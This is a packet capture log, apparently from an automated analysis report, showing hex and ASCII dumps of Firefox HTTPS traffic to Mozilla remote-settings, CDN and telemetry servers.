2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 95 f3 37 6b 28 0a a5 cc 42 3c 66 e1 cb 15 8d d4 39 56 ba 9c 0f 8c 6e b8 13 11 d0 e2 3b 51 7d d6 91 f6 cb 13 bb b0 4f 4e 5a 71 b0 49 e6 36 ea 97 88 62 12 37 38 05 76 18 07 1c 5d f2 f7 14 5b f1 35 98 f5 96 94 b6 cd 09 3b 88 54 d3 99 37 1d 04 9f 04 c4 75 12 d1 dc 0c 42 41 e7 03 2d 62 1a 9c d3 56 4e d2 56 71 bf b0 1e 5d 88 3c 55 e7 61 4b aa c1 55 53 22 ff 00 42 ae 08 75 8a 0e 60 ae bb 7d ca a4 2f a7 c0 49 46 2c dd d3 55 40 00 dc 8b f5 6b 15 35 d3 55 32 6a 6e 17 c5 56 ac 5f 61 b7 e2 0b 34 dc 75 0d c0 37 69 e3 c6 63 c8 70 c8 3e 2c 91 9e a0 6d e5 36 e1 d5 9c 49 f6 0b 07 e2 5b 36 37 c3 b6 cc 4f 62 a8 f0 9b 7d ca 3d 45 bc 78 cc 79 25 86 51 6e ac b0 9e e0 36 ef 6d 5b 51 70 22 e8 3e 40 f6 8f c3 ca ba 0d e3 de ba 6e 23 cf f5 f5 2b 7d 74 77 78 a4 8c 6b 88 7e 1f d9 e6 Data Ascii: 7k(B<f9Vn;Q}ONZqI6b78v][5;T7uBA-bVNVq]<UaKUS"Bu`}/IF,U@k5U2jnV_a4u7icp>,m6I[67Ob}=Exy%Qn6m[Qp">@n#+}twxk~
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: e9 2c e6 7e e8 9e 50 27 63 d7 9a 9b 7a 3d 63 d9 57 4d e2 67 10 6f e9 ab ae 26 55 75 08 89 4c b2 ca 1d 65 44 ea 9c e7 34 81 6e cd 4c c7 b4 d0 52 db 6d f8 ae ae 9e 86 88 1a 28 a3 e6 13 00 37 54 05 cc 08 b4 6e 81 67 2d 19 b4 16 e6 b0 b2 95 ad 39 e3 9b 96 2b 65 0d 9e d5 8d eb 69 2d b6 e8 c6 28 62 6e 28 da 38 c3 a8 02 f2 44 67 b4 1b 90 59 dd f6 b3 30 b6 82 cc cd c3 ff 00 89 c7 86 07 e2 85 8c 3f c7 dd ff 00 ea 8a f7 fe cc d9 a5 f8 e1 55 f2 61 fe 52 fa 5f 6c 26 75 fe 3f 57 7c 8a 7f e4 2e d2 c3 1c 38 74 3b a7 7c 81 15 94 b0 8e 00 b4 71 b6 40 86 6d 22 ce 3a e6 b7 26 2e b4 1e 91 94 ab 55 18 c8 31 70 8a f7 1a 88 bf 64 b3 75 07 99 17 09 2a 97 3a 24 53 90 14 49 33 97 e3 5e f3 27 1d e2 3b 7c d6 ab e6 20 9a e7 6f 99 d8 8a 39 42 27 6d c0 fb 98 87 6c 4c 42 e2 5a f2 b1 31 Data Ascii: ,~P'cz=cWMgo&UuLeD4nLRm(7Tng-9+ei-(bn(8DgY0?UaR_l&u?W\|.8t;\|q@m":&.U1pdu*:$SI3^';\| o9B'mlLBZ1
2024-07-26 18:11:05 UTC	559	IN	Data Raw: dd f5 7f 3e ab db af d5 f8 94 44 a2 25 11 63 57 8a 07 0f 0b 5f 88 b6 04 69 8e 16 97 8d b2 b2 65 9d 71 b4 b9 b1 86 46 7f 14 bc aa 76 db b5 d5 6c d2 e7 89 91 68 d1 c2 2b 3b 82 93 81 2a 89 ac 89 15 28 03 b6 4c 1d 18 0e 2d 00 86 91 b2 c3 31 2b 32 e6 fd 25 c8 21 2a db 6d 74 65 15 55 33 13 0f 18 cd ab c4 62 4f ab 09 c6 7a 38 96 9d 42 90 3c 75 34 64 5e 71 d7 64 ce 2d 3b d0 d3 49 74 b2 5c e1 28 2b a8 c0 d8 38 e6 66 22 82 50 22 67 11 96 09 79 44 9d b9 63 39 a3 e4 e3 35 58 5a b0 ba 2c 76 53 62 a6 a6 50 d5 dd d1 32 61 1e 65 da 58 58 b2 26 da 0e 50 1f b0 49 fd c1 76 cb 08 8e db 7c a1 6a 1b fd c1 6a 6a af e1 4d 70 2d cd 6c c2 30 c3 af 6c f5 27 27 cd 8e 38 be 95 66 ae dc 3c ae 86 e4 d6 2c bb a7 a7 6e c2 ab ae 92 6f 58 43 05 3f ab 7f a5 4e 0b 03 a3 8f c3 9a d0 23 63 dc Data Ascii: >D%cW_ieqFvlh+;(L-1+2%!mteU3bOz8B<u4d^qd-;It\(+8f"P"gyDc95XZ,vSbP2aeXX&PIv\|jjjMp-l0l''8f<,noXC?N#c

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.5	64276	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.5	64281	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	509	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:55:32 GMT Age: 933 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	881	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	58	IN	Data Raw: 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: "https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.5	64279	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/661cc2b3-833b-4044-a93a-a208f3d6fd1c HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840740334082 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 5494 x-goog-hash: crc32c=RFoV/g== x-goog-hash: md5=Je9ZgLdmsbgM+cz8XjQ9pQ== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 5494 X-GUploader-UploadID: AHxI1nPa_i9N5iOVn2S2GRL1UwfUFfeOSn9acwpJWWG0wmmqYAQkBFC8fJwur424gJiak-aZ7mnyhGR6uQ Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:40 GMT ETag: "25ef5980b766b1b80cf9ccfc5e343da5" Content-Type: application/octet-stream Age: 175256 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 83 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDRL\tEXtSoftwareAdobe ImageReadyqe<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 63 62 39 33 30 31 66 62 2d 31 62 31 61 2d 34 39 64 34 2d 39 62 30 37 2d 64 66 64 65 37 61 64 64 39 64 33 62 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 34 63 37 63 31 63 38 32 2d 62 32 65 64 2d 61 30 34 36 2d 39 61 34 34 2d 38 31 65 65 65 64 30 32 34 34 35 62 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e Data Ascii: p:CreatorTool="Adobe Photoshop 22.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:cb9301fb-1b1a-49d4-9b07-dfde7add9d3b" stRef:documentID="adobe:docid:photoshop:4c7c1c82-b2ed-a046-9a44-81eeed02445b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: d1 9a f7 d0 d2 19 03 6e ad 5c 7f 0f 8b b6 38 ab c5 54 5c bd 9d d6 1e 1b 2c 00 58 7b bd be ea 47 da b2 1f 08 52 96 ea b5 3e e2 83 53 2b c1 f7 e4 d8 85 bb ed a1 3e f8 31 03 7a 97 45 31 b6 be c0 cc 18 24 1e 79 f6 12 79 da 27 a0 c6 44 be 6b 2f 9b e9 51 73 c7 cb 83 05 80 be e6 57 a4 b4 5c 9a 74 43 bf ae ec d7 03 dc f0 e2 01 00 3c 92 10 c1 89 bf f8 36 30 81 aa d3 dc f7 2f 08 83 d2 f8 59 e2 88 72 a8 07 e5 89 d7 b3 78 9b ed 94 0c aa 6e 60 47 c0 88 b2 0f 00 6d 3a 67 ec 78 59 4d a4 59 fe 74 ea e7 c5 0c 3d 00 be 89 24 93 37 0e 21 00 c6 f6 97 58 b4 19 48 94 72 cd dd 2e 29 bb 7a 09 16 7a cc 65 68 b4 e5 02 16 68 59 07 c0 dc f6 57 80 57 9e 74 e3 90 6c 93 74 47 ea b4 f4 09 5f 33 44 00 40 f1 65 be b3 5a 90 54 b1 b4 5c ae 70 23 81 54 3e 57 2a 9b 20 18 11 87 dd 92 40 ae 59 Data Ascii: n\8T\,X{GR>S+>1zE1$yy'Dk/QsW\tC<60/Yrxn`Gm:gxYMYt=$7!XHr.)zzehhYWWtltG_3D@eZT\p#T>W* @Y
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 4f 5b e4 83 4a 4e 5b a0 af 7f 1c ad 41 c4 39 17 48 e0 d6 a9 2a eb e8 76 6c 57 f4 1b 00 52 34 4a 9e b6 d0 d8 b9 0a 4c 15 0c 39 f0 e9 9f 67 64 0d 65 13 82 0f be a4 bf f1 98 b9 eb 55 74 05 39 80 a3 38 50 a9 43 6a aa 3d e6 0e 0e 39 7c 1f 0f 81 29 28 57 9e b1 58 bb ed 61 00 2f 65 f4 88 b5 b3 68 9b 6b f2 76 32 00 63 b7 7f ee 9c 6e 23 a2 db a1 83 6a 08 9c 09 0f 70 92 3a 7a b0 18 b8 8e 93 3c 00 4e 20 d9 6d 0d 62 30 af fb 53 da ea 8d 6d 2b 90 0b b4 5e 94 ae 98 25 96 4d f4 c1 00 c3 25 f2 a4 1b 8c 1d 7f c3 d2 81 d9 e1 92 5a fa 86 27 82 13 e6 a4 2d da fb aa fb 81 cf 9a 7b fe 09 bb 32 77 ae d6 8b c7 aa b7 7c 25 a3 d5 e4 e4 6b 77 7e 5f 9d 77 af b9 77 9d 75 6c a7 55 7b 14 77 4e a9 9b 48 89 48 14 05 3b ec 45 a3 a5 f2 d9 e0 67 e2 c8 49 e9 8c 44 95 2e 9f 06 c4 0c 63 82 ac Data Ascii: O[JN[A9H*vlWR4JL9gdeUt98PCj=9\|)(WXa/ehkv2cn#jp:z<N mb0Sm+^%M%Z'-{2w\|%kw~_wwulU{wNHH;EgID.c
2024-07-26 18:11:05 UTC	622	IN	Data Raw: 7d a5 38 6e 86 34 61 0e f6 44 33 bb 81 36 4b 41 cc 60 8d e7 ac 0b 27 ac 83 1b ad 73 87 05 26 ca 53 e6 cb 33 6e 85 65 5c 22 ae 48 b2 f8 1f b5 b1 9f 5e f5 9a b9 fb 75 ab b6 da 6e f1 07 91 23 db bd 5f 44 02 1e 01 86 17 2e 12 4b cb a5 b2 09 e2 c8 49 08 46 d1 28 bc af 3a 5b 75 b5 19 87 c0 08 e5 1b 6d aa a1 17 aa e9 b9 23 56 cd 7b ac ee 04 2c 03 68 34 24 27 f9 ca 9b 07 da f0 b9 94 01 e8 ca 4e d6 a9 3d d6 fe f5 66 f5 0e 76 e1 38 c3 1e 88 4a d4 ce fb 20 ed de 0e 36 93 99 25 c8 01 31 b7 00 b9 79 b8 58 1c 76 19 29 1a 0d 89 11 d2 09 09 15 21 78 40 28 95 00 de bc e7 a4 2f 46 b1 a5 6a c6 f1 6c 07 14 ad 47 59 47 33 8e 53 40 26 6c 6f a4 f5 a7 b1 1e ee 68 44 00 da ea b1 f9 0c 49 32 b7 50 1a 3f 4b 99 7e ab 34 69 5e 9a 34 fe 6f 05 40 77 60 32 69 cd 11 f3 e8 76 7a 72 17 58 Data Ascii: }8n4aD36KA`'s&S3ne\"H^un#_D.KIF(:[um#V{,h4$'N=fv8J 6%1yXv)!x@(/FjlGYG3S@&lohDI2P?K~4i^4o@w`2ivzrX

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.5	64284	34.120.208.123	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	620	OUT	POST /submit/firefox-desktop/baseline/1/34693bf6-9a51-49f1-85ba-23369f647349 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-type: application/json; charset=utf-8 content-encoding: gzip content-length: 824 date: Fri, 26 Jul 2024 18:11:03 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:05 UTC	824	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff ad 95 db 6e e3 36 10 40 ff 45 af 9b 31 48 8a ba f9 0f fa dc 14 7d 14 78 19 d9 44 64 4a 25 29 27 6e b0 ff de 21 9d 78 dd c2 5d 2c 16 0b 08 86 cc 99 e1 9c b9 ea bd 5a 9d 3f 8c ce 4f 4b b5 7f af 22 fe 55 ed c5 53 15 93 0a 69 4c ee 84 d5 be 12 4c d4 c0 19 30 f9 cc e5 5e b2 2f 8c ef 19 ab 9e 2a f4 f6 4e 47 02 eb 40 b4 cf bc d9 8b 8e 94 af 3a 01 55 5c 3c 69 28 93 dc 19 b3 d5 db 8a 81 ac 7c 8a d9 25 be 25 f4 d1 2d 3e c2 c9 1d 82 4a f4 0a 8e 9e d3 ba 84 04 af ee 6f 15 2c 70 de 42 58 e6 79 d9 52 36 d2 41 79 73 a4 5b cd e2 13 9d 97 6b 53 50 59 96 2e 6b 26 f2 ee a4 b7 78 33 ca b4 f9 3d fb fd cd 92 bc 69 55 87 bc 43 30 52 08 90 d2 0a d0 ad 11 50 db da 08 d1 d4 13 ef 64 f5 f5 eb 53 65 e2 f9 13 26 e0 4c e1 e0 43 12 f4 4a cf 74 db 4d fb 9e Data Ascii: n6@E1H}xDdJ%)'n!x],Z?OK"USiLL0^/*NG@:U\<i(\|%%->Jo,pBXyR6Ays[kSPY.k&x3=iUC0RPdSe&LCJtM
2024-07-26 18:11:05 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:05 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.5	64282	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/bfaa2e89-f7e3-478e-b83d-3bf27fc2c00f HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1698441806613258 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7030 x-goog-hash: crc32c=GJudXQ== x-goog-hash: md5=c/JN2HG1fNqceikYDQdsbw== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 7030 X-GUploader-UploadID: AHxI1nMk61PXXuIG0TX-smp-FlhG9kXyZfZFL0BF6eemVIsmIupX5lDXMYAew3k1k0fWOeLTWBfKqkHCTQ Server: UploadServer Date: Thu, 25 Jul 2024 03:45:06 GMT Cache-Control: public,max-age=604800 Age: 138359 Last-Modified: Fri, 27 Oct 2023 21:23:26 GMT ETag: "73f24dd871b57cda9c7a29180d076c6f" Content-Type: application/octet-stream Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 25 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDR>atEXtSoftwareAdobe ImageReadyqe<%iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 41 44 35 30 42 34 30 31 36 43 44 33 31 31 45 44 42 35 33 38 38 44 33 44 42 35 46 33 38 46 35 35 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 44 35 30 42 34 30 32 36 43 44 33 31 31 45 44 42 35 33 38 38 44 33 44 42 35 46 33 38 46 35 35 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e d1 2b 8e 01 00 00 17 e7 49 44 41 54 78 da ec 5d 09 7c 54 d5 f5 fe ee 9b 35 33 99 ec 21 21 81 24 12 12 82 24 ec b2 1a 17 54 44 f6 45 04 c4 ad 55 d4 6e bf da ba b7 58 db aa ad 5a 6b 2d ff aa 54 5b 15 44 54 2c 14 15 c1 42 45 Data Ascii: ef:instanceID="xmp.iid:AD50B4016CD311EDB5388D3DB5F38F55" stRef:documentID="xmp.did:AD50B4026CD311EDB5388D3DB5F38F55"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>+IDATx]\|T53!!$$TDEUnXZk-T[DT,BE
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: cc 5c b1 3a 90 20 10 02 24 fc 28 61 ce ea 0f 11 93 3e 46 d1 13 38 b2 07 41 33 07 c1 3c 61 e6 8a 95 8c 67 09 f2 00 80 3e 46 2f cc 5c f9 01 a2 07 4e 80 a3 0d 9d 4c bb e9 6d 7e 80 00 a9 57 2f 20 53 96 2f 0f 04 31 f4 0f 00 7c 26 6f fa 3f de 40 dc e0 eb e5 36 cf 1d d4 ad 9d 99 83 f4 1b 96 90 eb 5f 78 ea 92 02 80 5c ff a7 3f 92 d4 6b 16 f5 da fc 4b a1 09 b8 77 70 fb 52 32 ee a1 bb 2f 09 00 c8 98 07 ee 20 d9 b7 3d a6 88 4c 1d 7f 79 b8 94 81 4e 21 3a e4 e4 d2 b2 67 61 5a 97 4c 78 e4 65 32 68 d6 95 3d 0b 80 b4 49 23 c8 f8 47 5e f1 b8 7a c1 e9 e7 8b e7 84 6e 13 41 dd 14 39 29 3a 4c 1d 6e 90 d7 eb f2 38 81 db a9 23 93 9e 7f 07 b1 59 89 3d 03 80 f0 be 11 c2 e4 97 56 b1 df 8c 52 ea 74 90 0a 9d 0b 7a 48 3f 2d 1e 9e 1a 85 ed bf ec 8b 83 8f 25 61 ee 70 23 c4 76 99 25 77 Data Ascii: \: $(a>F8A3<ag>F/\NLm~W/ S/1\|&o?@6_x\?kKwpR2/ =LyN!:gaZLxe2h=I#G^znA9):Ln8#Y=VRtzH?-%ap#v%w
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 8f fe b1 87 96 b3 fd e7 49 a3 67 1a dc f2 4d 1c 95 48 34 7b be 3e c3 c6 7b b4 14 65 00 10 19 62 c3 fb c5 23 22 25 53 ce d5 bb b8 6e e2 69 5d 23 fb cb d7 05 fc ea ac 03 4e 9b 5b de 13 87 5c de 71 59 c3 60 88 56 71 30 08 d2 a8 8f 4e 1f 48 b4 a6 28 59 9b 00 c6 59 92 a3 d5 7e 85 75 bb dd fe 73 02 28 f7 95 72 5c 03 18 fa 5c 06 53 bf 44 3e e0 d5 94 0b 3d 7a 40 96 7c e2 96 17 d7 ff 91 61 04 5b 8e d9 3a ec 63 91 4f 01 c7 69 7c f6 16 f8 14 30 27 73 42 17 5d b9 ad 7c de 40 ee d3 c6 5c de 1a 83 11 51 29 03 58 47 99 d5 92 e0 a3 33 b2 be b9 37 8a fc 1a 8f 4f f1 a9 d9 9b 96 55 75 fc 65 ab 88 67 6f 8f 63 00 88 f4 e9 5e 6f ed 6d c5 63 ab ea 80 ae 86 72 55 de 49 20 b9 37 26 73 12 95 99 c9 bc 82 9d 6a a2 d6 41 da 5d 4b 01 99 3f 12 fb ef a0 83 25 a7 c6 28 60 62 ba de e7 fb Data Ascii: IgMH4{>{eb#"%Sni]#N[\qY`Vq0NH(YY~us(r\\SD>=z@\|a[:cOi\|0'sB]\|@\Q)XG37OUuegoc^omcrUI 7&sjA]K?%(`b
